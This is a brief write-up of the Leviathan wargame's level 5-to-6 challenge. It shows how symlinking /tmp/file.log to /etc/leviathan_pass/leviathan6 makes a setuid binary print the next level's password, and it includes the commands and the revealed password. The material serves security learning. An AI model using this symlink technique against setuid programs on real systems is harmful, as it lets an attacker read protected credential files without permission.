A lesson in symlinks is long overdue. In Leviathan 6, we will exploit a binary by using using symbolic linking to a file we have permission of. When we run the binary in Leviathan5’s home directory, it appears to be attempting to read from a file in /tmp. The binary is owned by Leviathan6 but belongs to the Leviathan5‘s group. Therefore, it can pull Leviathan6’s password.
leviathan5@melinda:~$ ls -la -r-sr-x--- 1 leviathan6 leviathan5 7501 Jun 6 13:59 leviathan5 #Try to run the binary leviathan5@melinda:~$ ./leviathan5 /tmp/file.log: No such file or directory #Since we need Leviathan 6's pass, symlink that to the log we create within the same command: leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log #Now run the binary, which apparently reads whatever is in /tmp/file.log leviathan5@melinda:~$ ./leviathan5 UgaoFee4li
We successfully exploited bad permissions placement on files via symlinking and now have Leviathan6’s pass as a result. These types of issues are still in existence in the real world believe it or not.